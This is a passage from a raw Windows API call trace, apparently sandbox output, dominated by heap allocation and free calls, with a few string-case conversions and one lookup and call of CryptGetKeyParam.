cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0076.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0076.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0076.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0076.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0076.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0076.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0076.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0076.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0076.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.977] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0076.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0076.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0076.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0076.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0076.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0076.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0076.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0076.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0076.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0076.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0076.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0076.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0076.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0076.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0076.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0076.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0076.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0076.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0076.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0076.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0076.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0076.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0076.978] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0076.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0076.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0076.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0076.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0076.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0076.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0076.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0076.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0076.979] CryptGetKeyParam (in: hKey=0x41ac700, dwParam=0x7, pbData=0x43e2660, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2660*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0076.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0076.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0076.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0076.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0076.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0076.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0076.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0076.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0076.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0076.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0076.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0076.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0076.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0076.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0076.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0076.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0076.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0076.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0076.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0076.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0076.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0076.981] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0076.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0076.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0076.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0076.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0076.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0076.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0076.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.981] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0076.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.981] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0076.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0076.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0076.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0076.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0076.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0076.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0076.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0076.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0076.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0076.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0076.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0076.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0076.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0076.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0076.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0076.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0076.983] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.983] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.983] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.983] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca580 [0076.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0076.986] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0076.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0076.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0076.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0076.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0076.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0076.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0076.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0076.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0076.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0076.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0076.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0076.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0076.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0076.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0076.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0076.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0076.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0076.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0076.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0076.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0076.987] RtlAllocateHeap (HeapHandle=0x1780000, 